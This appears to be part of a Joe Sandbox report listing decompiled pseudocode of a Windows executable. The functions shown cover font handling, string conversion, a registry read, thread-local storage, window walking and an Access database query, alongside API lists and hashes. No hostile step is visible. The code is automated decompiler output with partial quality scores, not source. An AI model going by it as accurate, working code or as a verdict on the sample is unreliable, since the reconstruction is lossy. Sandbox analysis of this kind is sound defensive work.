				 *[fs:0x0] =  *((intOrPtr*)(_t109 - 0xc));
				return E00412FBB(_t81,  *((intOrPtr*)(_t109 - 0x10)));
			}


















                                                                              0x0040a7dd
                                                                              0x0040a7e2
                                                                              0x0040a7e8
                                                                              0x0040a7f0
                                                                              0x0040a7f3
                                                                              0x0040a7fd
                                                                              0x0040a800
                                                                              0x0040a803
                                                                              0x0040a80a
                                                                              0x0040a80f
                                                                              0x0040a812
                                                                              0x0040a825
                                                                              0x0040a83d
                                                                              0x00000000
                                                                              0x0040a835
                                                                              0x0040a835
                                                                              0x0040a835
                                                                              0x0040a840
                                                                              0x0040a840
                                                                              0x0040a846
                                                                              0x0040a849
                                                                              0x0040a853
                                                                              0x0040a862
                                                                              0x0040a86c
                                                                              0x0040a881
                                                                              0x0040a888
                                                                              0x0040a891
                                                                              0x0040a899
                                                                              0x0040a8a0
                                                                              0x0040a8a7
                                                                              0x0040a8aa
                                                                              0x0040a8af
                                                                              0x0040a8b1
                                                                              0x0040a8b5
                                                                              0x0040a8b5
                                                                              0x0040a8c0
                                                                              0x0040a8cd
                                                                              0x0040a8d1
                                                                              0x0040a8e1
                                                                              0x0040a8e4
                                                                              0x0040a8e8
                                                                              0x0040a8eb
                                                                              0x0040a8ee
                                                                              0x0040a8f9
                                                                              0x0040a8fd
                                                                              0x0040a905
                                                                              0x0040a907
                                                                              0x0040a907
                                                                              0x0040a90f
                                                                              0x0040a912
                                                                              0x0040a912
                                                                              0x0040a917
                                                                              0x0040a91e
                                                                              0x0040a925
                                                                              0x0040a933
                                                                              0x0040a946

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 0040A7DD
                                                                              • GetObjectA.GDI32(0040ADE8,0000003C,?), ref: 0040A849
                                                                              • lstrlenA.KERNEL32(?), ref: 0040A85A
                                                                              • GetDeviceCaps.GDI32(?,0000005A), ref: 0040A8D1
                                                                              • OleCreateFontIndirect.OLEAUT32(00000020,0044DEFC,?), ref: 0040A8FD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: CapsCreateDeviceFontH_prologIndirectObjectlstrlen
                                                                              • String ID:
                                                                              • API String ID: 4082312370-3916222277
                                                                              • Opcode ID: e837e6e32dedd2ae5b39fabd8b2637de7c3d9a6e084b0529e315272666ecf5a3
                                                                              • Instruction ID: 5972f824610752a30fb003f3ef6cffcbbdeb07862816cf9b4ba45c9e708fb7dd
                                                                              • Opcode Fuzzy Hash: e837e6e32dedd2ae5b39fabd8b2637de7c3d9a6e084b0529e315272666ecf5a3
                                                                              • Instruction Fuzzy Hash: D4419971E01259AFCB10EFE5D945ADDBBB4BF18304F10807EE815E7291E7788A19CB15
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041FCB0, Relevance: 10.6, APIs: 7, Instructions: 111memorystringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 73%
                                                                              			E0041FCB0(void* __ecx, char* _a4) {
				int _v8;
				intOrPtr _v20;
				short* _v28;
				int _v32;
				int _v36;
				short* _v40;
				void* _v52;
				void* __ebp;
				int _t16;
				void* _t26;
				short* _t27;
				int _t28;
				int _t40;
				int _t41;
				void* _t42;
				short* _t47;
				char* _t49;
				int _t51;
				intOrPtr _t53;
				short* _t54;

				_t42 = __ecx;
				_push(0xffffffff);
				_push(0x44e5a0);
				_push(E00412BF8);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t53;
				_t54 = _t53 - 0x14;
				_v28 = _t54;
				_t49 = _a4;
				if(_t49 == 0) {
					L13:
					_t16 = 0;
					L19:
					 *[fs:0x0] = _v20;
					return _t16;
				}
				_t40 = lstrlenA(_t49) + 1;
				_v32 = _t40;
				_t51 = MultiByteToWideChar(0, 0, _t49, _t40, 0, 0);
				_v36 = _t51;
				if(_t51 == 0) {
					L10:
					if(GetLastError() > 0) {
						E0041FC30(GetLastError() & 0x0000ffff | 0x80070000);
						goto L13;
					}
					E0041FC30(GetLastError());
					_t16 = 0;
					goto L19;
				}
				_v8 = 0;
				_t26 = _t51 + _t51;
				if(_t51 >= 0x1000) {
					_t27 = E00412247(_t26);
					_t54 =  &(_t54[2]);
					_t47 = _t27;
					_v40 = _t47;
					_v8 = 0xffffffff;
				} else {
					E00412260(_t26 + 0x00000003 & 0xfffffffc, _t42);
					_v28 = _t54;
					_t47 = _t54;
					_v40 = _t47;
					_v8 = 0xffffffff;
				}
				if(_t47 != 0) {
					_t28 = MultiByteToWideChar(0, 0, _a4, _t40, _t47, _t51);
					if(_t28 != 0) {
						__imp__#2(_t47);
						_t41 = _t28;
						if(_t51 >= 0x1000) {
							_push(_t47);
							E00412A4D();
						}
						if(_t41 == 0) {
							E0041FC30(0x8007000e);
						}
						_t16 = _t41;
						goto L19;
					}
					if(_t51 >= 0x1000) {
						_push(_t47);
						E00412A4D();
					}
					goto L10;
				} else {
					E0041FC30(0x8007000e);
					_t16 = 0;
					goto L19;
				}
			}























                                                                              0x0041fcb0
                                                                              0x0041fcb3
                                                                              0x0041fcb5
                                                                              0x0041fcba
                                                                              0x0041fcc5
                                                                              0x0041fcc6
                                                                              0x0041fccd
                                                                              0x0041fcd3
                                                                              0x0041fcd6
                                                                              0x0041fcdb
                                                                              0x0041fdcc
                                                                              0x0041fdcc
                                                                              0x0041fdfa
                                                                              0x0041fe00
                                                                              0x0041fe0d
                                                                              0x0041fe0d
                                                                              0x0041fcea
                                                                              0x0041fceb
                                                                              0x0041fcfe
                                                                              0x0041fd00
                                                                              0x0041fd05
                                                                              0x0041fda2
                                                                              0x0041fdac
                                                                              0x0041fdc7
                                                                              0x00000000
                                                                              0x0041fdc7
                                                                              0x0041fdb1
                                                                              0x0041fdb6
                                                                              0x00000000
                                                                              0x0041fdb6
                                                                              0x0041fd0b
                                                                              0x0041fd12
                                                                              0x0041fd1b
                                                                              0x0041fd3c
                                                                              0x0041fd41
                                                                              0x0041fd44
                                                                              0x0041fd46
                                                                              0x0041fd49
                                                                              0x0041fd1d
                                                                              0x0041fd23
                                                                              0x0041fd28
                                                                              0x0041fd2d
                                                                              0x0041fd2f
                                                                              0x0041fd32
                                                                              0x0041fd32
                                                                              0x0041fd6c
                                                                              0x0041fd87
                                                                              0x0041fd8f
                                                                              0x0041fdd1
                                                                              0x0041fdd7
                                                                              0x0041fddf
                                                                              0x0041fde1
                                                                              0x0041fde2
                                                                              0x0041fde7
                                                                              0x0041fdec
                                                                              0x0041fdf3
                                                                              0x0041fdf3
                                                                              0x0041fdf8
                                                                              0x00000000
                                                                              0x0041fdf8
                                                                              0x0041fd97
                                                                              0x0041fd99
                                                                              0x0041fd9a
                                                                              0x0041fd9f
                                                                              0x00000000
                                                                              0x0041fd6e
                                                                              0x0041fd73
                                                                              0x0041fd78
                                                                              0x00000000
                                                                              0x0041fd78

                                                                              APIs
                                                                              • lstrlenA.KERNEL32(?), ref: 0041FCE2
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 0041FCF8
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 0041FD87
                                                                              • GetLastError.KERNEL32 ref: 0041FDA8
                                                                              • GetLastError.KERNEL32 ref: 0041FDAE
                                                                              • GetLastError.KERNEL32 ref: 0041FDBA
                                                                                • Part of subcall function 00412A4D: __lock.LIBCMT ref: 00412A6B
                                                                                • Part of subcall function 00412A4D: RtlFreeHeap.NTDLL(00000000,?,0044BC58,0000000C,004148DC,00000000,0044BD10,00000008,00414911,?,?,?,00414733,00000004,0044BD00,00000010), ref: 00412AB2
                                                                              • SysAllocString.OLEAUT32(00000000), ref: 0041FDD1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$ByteCharMultiWide$AllocFreeHeapString__locklstrlen
                                                                              • String ID:
                                                                              • API String ID: 2239859820-0
                                                                              • Opcode ID: 0d858a5a2278e1ec2dc8d46b732713cb78756dbb49cc2d56b9541277e8871e7b
                                                                              • Instruction ID: 5814fb192f880a29087053bfc4bd0927105c7e6f03bec0e2e998cf170e3ae287
                                                                              • Opcode Fuzzy Hash: 0d858a5a2278e1ec2dc8d46b732713cb78756dbb49cc2d56b9541277e8871e7b
                                                                              • Instruction Fuzzy Hash: BD31FD72D00615ABD7209B65DD46BFF7AA8FF04754F10013BF816E3280E67C998686EA
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042CADD, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 105registryCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 70%
                                                                              			E0042CADD(void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t46;
				intOrPtr* _t65;
				void* _t85;
				void* _t88;

				_t79 = __edx;
				E004128A0(E00430D5A, _t88);
				_t37 =  *0x457184; // 0xb7aa1229
				 *((intOrPtr*)(_t88 - 0x10)) = _t37;
				_t85 = __ecx;
				 *(_t88 - 0x120) = 0;
				_t38 = E0042B726(__ecx, __edx);
				 *((intOrPtr*)(_t88 - 0x128)) = _t38;
				if(_t38 != 0) {
					do {
						_t79 = _t88 - 0x128;
						_t65 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 + 0x54)))) + 0x14))(_t88 - 0x128);
						if(_t65 != 0) {
							_t79 =  *_t65;
							 *((intOrPtr*)( *_t65 + 0xc))(0, 0xfffffffc, 0, 0);
						}
					} while ( *((intOrPtr*)(_t88 - 0x128)) != 0);
				}
				_t98 =  *((intOrPtr*)(_t85 + 0x50));
				if( *((intOrPtr*)(_t85 + 0x50)) != 0) {
					_push("Software\\");
					E0040830B(_t88 - 0x11c, _t98);
					 *((intOrPtr*)(_t88 - 4)) = 0;
					E0042B737(_t88 - 0x11c,  *((intOrPtr*)(_t85 + 0x50)));
					_push(0x449394);
					_push(_t88 - 0x11c);
					_push(_t88 - 0x12c);
					_t46 = E00407A53(_t88 - 0x11c);
					_push( *((intOrPtr*)(_t85 + 0x64)));
					 *((char*)(_t88 - 4)) = 1;
					_push(_t46);
					_push(_t88 - 0x124);
					E00407A53(_t88 - 0x11c);
					 *((char*)(_t88 - 4)) = 3;
					E00401000( *((intOrPtr*)(_t88 - 0x12c)) + 0xfffffff0, _t79);
					_push(_t88 - 0x124);
					_push(0x80000001);
					E0042C9C9(_t79);
					if(RegOpenKeyA(0x80000001,  *(_t88 - 0x11c), _t88 - 0x120) == 0) {
						if(RegEnumKeyA( *(_t88 - 0x120), 0, _t88 - 0x118, 0x104) == 0x103) {
							_push(_t88 - 0x11c);
							_push(0x80000001);
							E0042C9C9(_t79);
						}
						RegCloseKey( *(_t88 - 0x120));
					}
					RegQueryValueA(0x80000001,  *(_t88 - 0x124), _t88 - 0x118, _t88 - 0x130);
					E00401000( *(_t88 - 0x124) - 0x10, _t79);
					E00401000( &(( *(_t88 - 0x11c))[0xfffffffffffffff0]), _t79);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t88 - 0xc));
				return E00412FBB(1,  *((intOrPtr*)(_t88 - 0x10)));
			}









                                                                              0x0042cadd
                                                                              0x0042cae2
                                                                              0x0042caed
                                                                              0x0042caf6
                                                                              0x0042caf9
                                                                              0x0042cafb
                                                                              0x0042cb01
                                                                              0x0042cb08
                                                                              0x0042cb0e
                                                                              0x0042cb10
                                                                              0x0042cb15
                                                                              0x0042cb1c
                                                                              0x0042cb21
                                                                              0x0042cb23
                                                                              0x0042cb2c
                                                                              0x0042cb2c
                                                                              0x0042cb2f
                                                                              0x0042cb10
                                                                              0x0042cb37
                                                                              0x0042cb3a
                                                                              0x0042cb40
                                                                              0x0042cb4b
                                                                              0x0042cb59
                                                                              0x0042cb5c
                                                                              0x0042cb61
                                                                              0x0042cb6c
                                                                              0x0042cb73
                                                                              0x0042cb74
                                                                              0x0042cb79
                                                                              0x0042cb7c
                                                                              0x0042cb80
                                                                              0x0042cb87
                                                                              0x0042cb88
                                                                              0x0042cb99
                                                                              0x0042cb9d
                                                                              0x0042cba8
                                                                              0x0042cbae
                                                                              0x0042cbaf
                                                                              0x0042cbca
                                                                              0x0042cbea
                                                                              0x0042cbf2
                                                                              0x0042cbf3
                                                                              0x0042cbf4
                                                                              0x0042cbf4
                                                                              0x0042cbff
                                                                              0x0042cbff
                                                                              0x0042cc1b
                                                                              0x0042cc24
                                                                              0x0042cc32
                                                                              0x0042cc32
                                                                              0x0042cc3d
                                                                              0x0042cc4f

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 0042CAE2
                                                                              • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0042CBC2
                                                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 0042CBDF
                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,Software\), ref: 0042CBFF
                                                                              • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 0042CC1B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: CloseEnumH_prologOpenQueryValue
                                                                              • String ID: Software\
                                                                              • API String ID: 2161548231-964853688
                                                                              • Opcode ID: 82e553787280bd53ca098809db884a7fb69526bb0bb7422cdc428558258d0341
                                                                              • Instruction ID: df4a8358d44512eab2e3aab5947f5eb7ce26cd725ee5649e29835c3142a63b74
                                                                              • Opcode Fuzzy Hash: 82e553787280bd53ca098809db884a7fb69526bb0bb7422cdc428558258d0341
                                                                              • Instruction Fuzzy Hash: 9441A2319001289BCB25EB65DD85EEEB7B9EF49304F0001AAF145E2291DB789A95CF98
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042DE78, Relevance: 10.6, APIs: 7, Instructions: 96memoryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 85%
                                                                              			E0042DE78(long* __ecx, signed int _a4, intOrPtr _a8) {
				struct _CRITICAL_SECTION* _v8;
				void* __ebp;
				void* _t32;
				void* _t36;
				void* _t37;
				signed int _t52;
				long* _t59;
				struct _CRITICAL_SECTION* _t62;
				void* _t64;

				_push(__ecx);
				_t59 = __ecx;
				_t1 =  &(_t59[7]); // 0x45a0f4
				_t62 = _t1;
				_v8 = _t62;
				EnterCriticalSection(_t62);
				_t32 = _a4;
				if(_t32 <= 0) {
					L20:
					_push(_t62);
				} else {
					_t4 =  &(_t59[3]); // 0x3
					if(_t32 >=  *_t4) {
						goto L20;
					} else {
						_t64 = TlsGetValue( *_t59);
						if(_t64 == 0) {
							if(E0042DB64(0x10) == 0) {
								_t64 = 0;
							} else {
								_t64 = E0042DDCA(_t34);
							}
							 *(_t64 + 8) = 0;
							 *(_t64 + 0xc) = 0;
							_t10 =  &(_t59[5]); // 0x615028
							_t49 =  *_t10;
							_t11 =  &(_t59[6]); // 0x4
							 *(_t64 +  *_t11) =  *_t10;
							_t59[5] = _t64;
							goto L10;
						} else {
							_t52 = _a4;
							if(_t52 >=  *(_t64 + 8) && _a8 != 0) {
								L10:
								_t36 =  *(_t64 + 0xc);
								if(_t36 != 0) {
									_t16 =  &(_t59[3]); // 0x3
									_t49 =  *_t16 << 2;
									_t37 = LocalReAlloc(_t36,  *_t16 << 2, 2);
								} else {
									_t15 =  &(_t59[3]); // 0x3
									_t37 = LocalAlloc(0,  *_t15 << 2);
								}
								if(_t37 == 0) {
									LeaveCriticalSection(_v8);
									_t37 = E00422EAF(_t49);
								}
								 *(_t64 + 0xc) = _t37;
								_t20 =  &(_t59[3]); // 0x3
								E00412140(_t37 +  *(_t64 + 8) * 4, 0,  *_t20 -  *(_t64 + 8) << 2);
								_t23 =  &(_t59[3]); // 0x3
								 *(_t64 + 8) =  *_t23;
								TlsSetValue( *_t59, _t64);
								_t52 = _a4;
							}
						}
						_t32 =  *(_t64 + 0xc);
						if(_t32 != 0 && _t52 <  *(_t64 + 8)) {
							 *((intOrPtr*)(_t32 + _t52 * 4)) = _a8;
						}
						_push(_v8);
					}
				}
				LeaveCriticalSection();
				return _t32;
			}












                                                                              0x0042de7b
                                                                              0x0042de7f
                                                                              0x0042de81
                                                                              0x0042de81
                                                                              0x0042de85
                                                                              0x0042de88
                                                                              0x0042de8e
                                                                              0x0042de95
                                                                              0x0042df71
                                                                              0x0042df71
                                                                              0x0042de9b
                                                                              0x0042de9b
                                                                              0x0042de9e
                                                                              0x00000000
                                                                              0x0042dea4
                                                                              0x0042deac
                                                                              0x0042deb0
                                                                              0x0042ded2
                                                                              0x0042dedf
                                                                              0x0042ded4
                                                                              0x0042dedb
                                                                              0x0042dedb
                                                                              0x0042dee1
                                                                              0x0042dee4
                                                                              0x0042dee7
                                                                              0x0042dee7
                                                                              0x0042deea
                                                                              0x0042deed
                                                                              0x0042def0
                                                                              0x00000000
                                                                              0x0042deb2
                                                                              0x0042deb2
                                                                              0x0042deb8
                                                                              0x0042def3
                                                                              0x0042def3
                                                                              0x0042def8
                                                                              0x0042df0a
                                                                              0x0042df0f
                                                                              0x0042df14
                                                                              0x0042defa
                                                                              0x0042defa
                                                                              0x0042df02
                                                                              0x0042df02
                                                                              0x0042df1c
                                                                              0x0042df21
                                                                              0x0042df27
                                                                              0x0042df27
                                                                              0x0042df2f
                                                                              0x0042df32
                                                                              0x0042df40
                                                                              0x0042df45
                                                                              0x0042df4c
                                                                              0x0042df51
                                                                              0x0042df57
                                                                              0x0042df57
                                                                              0x0042deb8
                                                                              0x0042df5a
                                                                              0x0042df5f
                                                                              0x0042df69
                                                                              0x0042df69
                                                                              0x0042df6c
                                                                              0x0042df6c
                                                                              0x0042de9e
                                                                              0x0042df72
                                                                              0x0042df7c

                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(0045A0F4,00000000,?,?,0045A0D8,?,0042E0F0,?,00000000,?,74B04DE0,00000000,?,0042D188,0042CC8D,0042D1A4), ref: 0042DE88
                                                                              • TlsGetValue.KERNEL32(0045A0D8,?,?,0045A0D8,?,0042E0F0,?,00000000,?,74B04DE0,00000000,?,0042D188,0042CC8D,0042D1A4,004239CA), ref: 0042DEA6
                                                                              • LocalAlloc.KERNEL32(00000000,00000003,00000010,?,?,0045A0D8,?,0042E0F0,?,00000000,?,74B04DE0,00000000,?,0042D188,0042CC8D), ref: 0042DF02
                                                                              • LocalReAlloc.KERNEL32(?,00000003,00000002,00000010,?,?,0045A0D8,?,0042E0F0,?,00000000,?,74B04DE0,00000000,?,0042D188), ref: 0042DF14
                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,0045A0D8,?,0042E0F0,?,00000000,?,74B04DE0,00000000,?,0042D188,0042CC8D,0042D1A4,004239CA), ref: 0042DF21
                                                                              • TlsSetValue.KERNEL32(0045A0D8,00000000), ref: 0042DF51
                                                                              • LeaveCriticalSection.KERNEL32(0045A0F4,?,?,0045A0D8,?,0042E0F0,?,00000000,?,74B04DE0,00000000,?,0042D188,0042CC8D,0042D1A4,004239CA), ref: 0042DF72
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$AllocLeaveLocalValue$Enter
                                                                              • String ID:
                                                                              • API String ID: 784703316-0
                                                                              • Opcode ID: e7df2054bc604726881da26f1eb46b2c7e2244ca5358edf6b23d3a65cd685603
                                                                              • Instruction ID: fcd6035f0b90d21c0d9d6da7d37b9e3363e18cffba046e8fe3cae58999833390
                                                                              • Opcode Fuzzy Hash: e7df2054bc604726881da26f1eb46b2c7e2244ca5358edf6b23d3a65cd685603
                                                                              • Instruction Fuzzy Hash: 0931BC70A00625EFCB24EF55EA84C6ABBA9FF04310751C52EE516C7610CB74BD54CB98
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00410A99, Relevance: 10.6, APIs: 7, Instructions: 86windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 76%
                                                                              			E00410A99(void* __ebx) {
				void* __ebp;
				void* _t28;
				void* _t36;
				signed char _t37;
				intOrPtr _t41;
				void* _t42;
				void* _t44;
				intOrPtr _t45;
				void* _t46;

				_t36 = __ebx;
				_t41 =  *((intOrPtr*)(_t46 + 0x10));
				if(_t41 == 0) {
					_t45 =  *((intOrPtr*)(_t46 + 0x10));
					L14:
					_t42 = E00426406(_t45, GetTopWindow( *(_t45 + 0x1c)));
					if(_t42 != 0) {
						L7:
						if((GetWindowLongA( *(_t42 + 0x1c), 0xffffffec) & 0x00010000) == 0) {
							L18:
							return _t42;
						}
						_push(_t36);
						_t37 =  *(_t46 + 0x1c);
						if((_t37 & 0x00000001) == 0 || IsWindowVisible( *(_t42 + 0x1c)) != 0) {
							if((_t37 & 0x00000002) == 0 || E00428444(_t42) != 0) {
								_push(_t37);
								_push(0);
								_push(_t42);
								goto L17;
							} else {
								goto L12;
							}
						} else {
							L12:
							_push(_t37);
							_push(_t42);
							_push(_t45);
							L17:
							_t42 = E00410A99(_t37);
							goto L18;
						}
					}
					return _t45;
				}
				_t28 = E00426406(_t44, GetWindow( *(_t41 + 0x1c), 2));
				_t45 =  *((intOrPtr*)(_t46 + 0x10));
				while(_t28 == 0) {
					_t41 = E00410A44(_t45, E00426406(_t45, GetParent( *(_t41 + 0x1c))));
					if(_t41 == 0 || _t41 == _t45) {
						goto L14;
					} else {
						_t28 = E00426406(_t45, GetWindow( *(_t41 + 0x1c), 2));
						continue;
					}
				}
				_t42 = E00426406(_t45, GetWindow( *(_t41 + 0x1c), 2));
				goto L7;
			}












                                                                              0x00410a99
                                                                              0x00410a9b
                                                                              0x00410aa2
                                                                              0x00410b42
                                                                              0x00410b46
                                                                              0x00410b55
                                                                              0x00410b59
                                                                              0x00410b04
                                                                              0x00410b14
                                                                              0x00410b6b
                                                                              0x00000000
                                                                              0x00410b6b
                                                                              0x00410b16
                                                                              0x00410b17
                                                                              0x00410b1e
                                                                              0x00410b30
                                                                              0x00410b5f
                                                                              0x00410b60
                                                                              0x00410b62
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00410b3d
                                                                              0x00410b3d
                                                                              0x00410b3d
                                                                              0x00410b3e
                                                                              0x00410b3f
                                                                              0x00410b63
                                                                              0x00410b68
                                                                              0x00000000
                                                                              0x00410b6a
                                                                              0x00410b1e
                                                                              0x00000000
                                                                              0x00410b5b
                                                                              0x00410ab7
                                                                              0x00410abc
                                                                              0x00410af0
                                                                              0x00410ad8
                                                                              0x00410adc
                                                                              0x00000000
                                                                              0x00410ae2
                                                                              0x00410aeb
                                                                              0x00000000
                                                                              0x00410aeb
                                                                              0x00410adc
                                                                              0x00410b02
                                                                              0x00000000

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Window$LongParentVisible
                                                                              • String ID:
                                                                              • API String ID: 506644340-0
                                                                              • Opcode ID: e9847245f9dd1eaff5567f8393f1fb1938c220977b46e8526e5ed735ee370d9b
                                                                              • Instruction ID: 3d9ca9c5c6fd9efd1b326305b11bfc860187603153bae37d8cc92170700b868b
                                                                              • Opcode Fuzzy Hash: e9847245f9dd1eaff5567f8393f1fb1938c220977b46e8526e5ed735ee370d9b
                                                                              • Instruction Fuzzy Hash: EE21D331A047356BC730BBA59D09FAB72ACAF40758F15052AF942D7252C6ACECC1866C
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0040737D, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 62%
                                                                              			E0040737D(void* __eflags) {
				void* _t31;
				void* _t33;
				void* _t44;
				void* _t47;
				intOrPtr* _t49;
				void* _t51;
				void* _t53;

				E004128A0(E00430AE8, _t51);
				 *((intOrPtr*)(_t51 - 0x10)) = _t53 - 0x2c;
				__imp__CoInitialize(0, _t44, _t47, _t33);
				_push("DRIVER={Microsoft Access Driver (*.mdb)};UID=admin;DBQ=ab.mdb;pwd= x;");
				 *((intOrPtr*)(_t51 - 4)) = 0;
				E0040678C(_t51 - 0x14);
				 *((char*)(_t51 - 4)) = 1;
				E004070AE(0x458420, 0x448e5c, 0, 0x17);
				E00406837(_t51 - 0x34, _t51 - 0x14);
				 *((char*)(_t51 - 4)) = 2;
				 *((short*)(_t51 - 0x24)) = 8;
				 *((intOrPtr*)(_t51 - 0x1c)) = E0041FCB0(_t51 - 0x34, "select * from Employees");
				 *((char*)(_t51 - 4)) = 3;
				E0040642C(E0040669E(0x458420), _t51 - 0x24, _t51 - 0x34, 2, 3, 1);
				_t49 = __imp__#9;
				_push(_t51 - 0x24);
				 *((char*)(_t51 - 4)) = 2;
				if( *_t49() < 0) {
					E0041FC30(_t29);
				}
				 *((char*)(_t51 - 4)) = 1;
				_t31 =  *_t49(_t51 - 0x34);
				if(_t31 < 0) {
					_t31 = E0041FC30(_t31);
				}
				_t42 =  *((intOrPtr*)(_t51 - 0x14));
				if( *((intOrPtr*)(_t51 - 0x14)) != 0) {
					_t31 = E004069A2(_t42);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t51 - 0xc));
				return _t31;
			}










                                                                              0x00407382
                                                                              0x0040738d
                                                                              0x00407393
                                                                              0x00407399
                                                                              0x004073a1
                                                                              0x004073a4
                                                                              0x004073b8
                                                                              0x004073bc
                                                                              0x004073c8
                                                                              0x004073d2
                                                                              0x004073d6
                                                                              0x004073e1
                                                                              0x004073e6
                                                                              0x004073ff
                                                                              0x00407404
                                                                              0x0040740d
                                                                              0x0040740e
                                                                              0x00407416
                                                                              0x00407419
                                                                              0x00407419
                                                                              0x00407422
                                                                              0x00407426
                                                                              0x0040742a
                                                                              0x0040742d
                                                                              0x0040742d
                                                                              0x00407432
                                                                              0x00407437
                                                                              0x00407439
                                                                              0x00407439
                                                                              0x00407443
                                                                              0x0040744c

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00407382
                                                                              • CoInitialize.OLE32(00000000), ref: 00407393
                                                                                • Part of subcall function 0040678C: __EH_prolog.LIBCMT ref: 00406791
                                                                                • Part of subcall function 004070AE: CoCreateInstance.OLE32(?,?,00000014,00448E34,00000014), ref: 004070D9
                                                                                • Part of subcall function 004070AE: OleRun.OLE32(00000014), ref: 004070E8
                                                                                • Part of subcall function 0041FCB0: lstrlenA.KERNEL32(?), ref: 0041FCE2
